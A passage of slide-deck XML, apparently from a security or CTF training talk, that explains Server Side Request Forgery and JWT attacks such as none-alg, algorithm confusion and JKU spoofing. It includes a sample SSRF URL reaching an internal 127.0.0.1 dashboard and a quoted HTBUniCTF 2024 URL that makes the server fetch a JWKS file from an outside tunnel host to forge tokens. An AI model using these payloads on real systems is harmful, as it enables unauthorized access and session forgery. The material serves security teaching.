            <a:ext cx="47724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lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>DEMO TIME</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="206" name="Google Shape;206;g3552b0b153c_0_17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3632788" y="1424675"/>
            <a:ext cx="4926426" cy="4926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552b0b153c_0_6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13" name="Google Shape;213;g3552b0b153c_0_6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14" name="Google Shape;214;g3552b0b153c_0_6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5" name="Google Shape;215;g3552b0b153c_0_61"/>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Server Side Request Forgery</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="4572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This occurs when you can trick a web server into making a request on your behalf</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Normal operation looks like this</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User -&gt; HTTP REQ -&gt; Web Server -&gt; HTTP RESP -&gt; USER</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SSRF</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Attacker -&gt; HTTP REQ -&gt; Web Server -&gt; HTTP REQ -&gt; Secondary Web Server -&gt; HTTP RESP -&gt; Web Server -&gt; HTTP RESP -&gt; Attacker</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Google Shape;216;g3552b0b153c_0_61"/>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SSRF</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552b0b153c_0_7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23" name="Google Shape;223;g3552b0b153c_0_7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24" name="Google Shape;224;g3552b0b153c_0_7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5" name="Google Shape;225;g3552b0b153c_0_71"/>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Simple Example</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http[://]secure.website/profile?pfp=http[://]cdn.secure.website/user1.jpg</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Here you see the server makes a request to the cdn to get the users profile picture. As this is in a GET parameter we can alter this to request something else. Lets say on the same web server as secure.website it is running an internal dashboard on port 8888. We can access this via:</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http[://]secure.website/profile?pfp=http[://]127.0.0.1:8888/</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This could also be used to leak information from a server to an attacker.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="Google Shape;226;g3552b0b153c_0_71"/>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SSRF</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3552b0b153c_0_12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33" name="Google Shape;233;g3552b0b153c_0_12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34" name="Google Shape;234;g3552b0b153c_0_1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5" name="Google Shape;235;g3552b0b153c_0_120"/>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Complex example</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HTBUniCTF 2024, there was an SSRF vulnerability via an advertising banner on a website. You could use this to chain vulns together to forge a JWT token ( will discuss this in a bit )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http://127.0.0.1:1337/api/analytics/redirect?ref=cta-announcement&amp;url=http://1d3f639cb927bf.lhr.life/jwks.json</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="Google Shape;236;g3552b0b153c_0_120"/>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SSRF</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552b0b153c_0_8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43" name="Google Shape;243;g3552b0b153c_0_8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44" name="Google Shape;244;g3552b0b153c_0_8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5" name="Google Shape;245;g3552b0b153c_0_80"/>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JSON Web Tokens</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JSON Web Tokens are used for session management. They are Base64 encoded and stored in a cookie in the browser.</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457200" marR="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These tokens are signed using a secret key which </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>means</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t> the user cannot modify them. There are attacks on these such as (not exhaustive):</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="9144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Key brute force (Symmetric)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="9144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None Alg Attack (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>Asymmetric</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="9144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Alg Confusion Attack (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>asymmetric</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="9144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Incorrect Signature (Both)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="914400" marR="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Jku Spoofing</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/>
              <a:ea typeface="Comic Sans MS"/>
              <a:cs typeface="Comic Sans MS"/>
              <a:sym typeface="Comic Sans MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="Google Shape;246;g3552b0b153c_0_80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3709800" y="339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JWT</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt2"/>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2018-05-13T11:45:40Z</dcterms:created>
</cp:coreProperties>
</file>